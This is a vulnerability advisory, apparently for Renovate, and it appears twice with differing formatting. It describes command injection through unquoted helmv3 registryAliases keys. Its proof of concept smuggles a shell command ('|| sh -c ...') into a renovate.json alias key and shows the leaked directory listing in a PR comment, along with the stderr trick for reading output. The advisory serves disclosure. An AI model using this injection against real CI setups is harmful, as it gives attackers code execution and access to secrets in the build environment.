Summary
Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands.
Details
Since #26848, registryAliases has become mergeable. This means that the helmv3 manager started honoring its value and uses a helm repo add <key> <parameters> command for each defined alias. See source code:
|
cmd.push(`helm repo add ${value.name} ${parameters.join(' ')}`); |
The key was not quoted, leading to the ability to use variable references (
$FOO) in it and have them printed by Renovate on the pull request, or even running any shell commands.
PoC
Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example:
test-chart/Chart.yaml:
apiVersion: v2
name: redis
version: 1.0.0
dependencies:
- name: redis
version: 18.13.10
repository: oci://registry-1.docker.io/bitnamicharts
test-chart/Chart.lock:
dependencies:
- name: redis
repository: oci://registry-1.docker.io/bitnamicharts
version: 18.13.10
digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38
generated: "2024-02-16T13:31:20.807026334Z"
Then add the following renovate.json:
{
"$schema": "https://docs.renovatebot.com/renovate-schema.json",
"extends": [
"config:base"
],
"registryAliases": {
"foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy"
}
}Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text:
File name: test-chart/Chart.lock
Command failed: helm repo add foo/bar || sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-update
Error: "helm repo add" requires 2 arguments
Usage: helm repo add [NAME] [URL] [flags]
bin
boot
dev
etc
go
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
This shows that the ls command executed successfully, and we can even see its output.
Note that redirecting any output you want to see to stderr (>&2) and making sure the final command fails (exit 1) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output.
Impact
All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.
Summary
Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands.
Details
Since #26848,
registryAliaseshas become mergeable. This means that the helmv3 manager started honoring its value and uses ahelm repo add <key> <parameters>command for each defined alias. See source code:renovate/lib/modules/manager/helmv3/artifacts.ts
Line 80 in 23f3df6
The key was not quoted, leading to the ability to use variable references (
$FOO) in it and have them printed by Renovate on the pull request, or even running any shell commands.PoC
Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example:
test-chart/Chart.yaml:
test-chart/Chart.lock:
Then add the following
renovate.json:{ "$schema": "https://docs.renovatebot.com/renovate-schema.json", "extends": [ "config:base" ], "registryAliases": { "foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy" } }Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text:
This shows that the
lscommand executed successfully, and we can even see its output.Note that redirecting any output you want to see to stderr (
>&2) and making sure the final command fails (exit 1) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output.Impact
All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.